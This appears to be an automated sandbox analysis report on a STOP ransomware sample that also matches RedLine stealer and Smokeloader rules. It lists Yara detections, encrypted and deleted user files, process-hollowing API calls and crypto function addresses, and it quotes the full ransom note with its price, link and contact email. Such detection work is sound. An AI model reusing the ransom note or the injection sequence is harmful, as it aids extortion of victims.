Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File moved: C:\Users\user\Desktop\NVWZAPQSQL\TQDFJHPUIU.png	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File moved: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File deleted: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File moved: C:\Users\user\Desktop\GRXZDKKVDB.png	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File deleted: C:\Users\user\Desktop\GRXZDKKVDB.png

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address			Jump to dropped file
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.2342522385.0000000002E8B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000D.00000002.2432836380.0000000002EB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2529798141.0000000002EAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2068190950.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.2068864914.0000000002ECB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2342341845.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.2616958897.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.2396309012.0000000002FC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000029.00000002.3255503396.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000029.00000002.3254939244.0000000002F2E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.2445927456.0000000004995000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015D5
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401603
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040161A
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026D2 NtOpenKey,	0_2_004026D2
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402745 NtEnumerateKey,	0_2_00402745
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402348
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402770 NtEnumerateKey,	0_2_00402770
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040217B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040217D
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021CB
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	0_2_004017DF
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015E0
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F1
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F5
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F8
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402188
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004027A0 NtClose,	0_2_004027A0
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021A1
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021BB
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015D5
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401603
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040161A
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026D2 NtOpenKey,	4_2_004026D2
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402745 NtEnumerateKey,	4_2_00402745
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402348
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040156B
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402770 NtEnumerateKey,	4_2_00402770
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,	4_2_0040217B
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,	4_2_0040217D
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021CB
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	4_2_004017DF
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015E0
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F1
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F5
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F8
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402188
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004027A0 NtClose,	4_2_004027A0
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021A1
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	8_2_04A00110
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A40110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	13_2_04A40110

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A03520	8_2_04A03520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07520	8_2_04A07520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A699	8_2_04A0A699
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A4B69F	8_2_04A4B69F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0E6E0	8_2_04A0E6E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A79A	8_2_04A0A79A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2D7F1	8_2_04A2D7F1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0C760	8_2_04A0C760
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0B0B0	8_2_04A0B0B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A070E0	8_2_04A070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A030F0	8_2_04A030F0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A100D0	8_2_04A100D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A026	8_2_04A0A026
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A1F030	8_2_04A1F030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0B000	8_2_04A0B000
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2D1A4	8_2_04A2D1A4
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A09120	8_2_04A09120
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A4E141	8_2_04A4E141
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A822C0	8_2_04A822C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07220	8_2_04A07220
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07393	8_2_04A07393
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A4E37C	8_2_04A4E37C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A05DE7	8_2_04A05DE7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A05DF7	8_2_04A05DF7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A42D1E	8_2_04A42D1E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A34E9F	8_2_04A34E9F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A08E60	8_2_04A08E60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07880	8_2_04A07880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A218D0	8_2_04A218D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2E9A3	8_2_04A2E9A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A2F9B0	8_2_04A2F9B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A059F7	8_2_04A059F7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A089D0	8_2_04A089D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A916	8_2_04A0A916
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07A80	8_2_04A07A80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0CA10	8_2_04A0CA10
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0DBE0	8_2_04A0DBE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A10B00	8_2_04A10B00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A02B60	8_2_04A02B60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040D240	9_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00419F90	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040C070	9_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042E003	9_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00408030	9_2_00408030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410160	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004021C0	9_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044237E	9_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004084C0	9_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004344FF	9_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0043E5A3	9_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040A660	9_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0041E690	9_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406740	9_2_00406740
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00402750	9_2_00402750
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040A710	9_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00408780	9_2_00408780
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042C804	9_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406880	9_2_00406880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004349F3	9_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004069F3	9_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00402B80	9_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406B80	9_2_00406B80
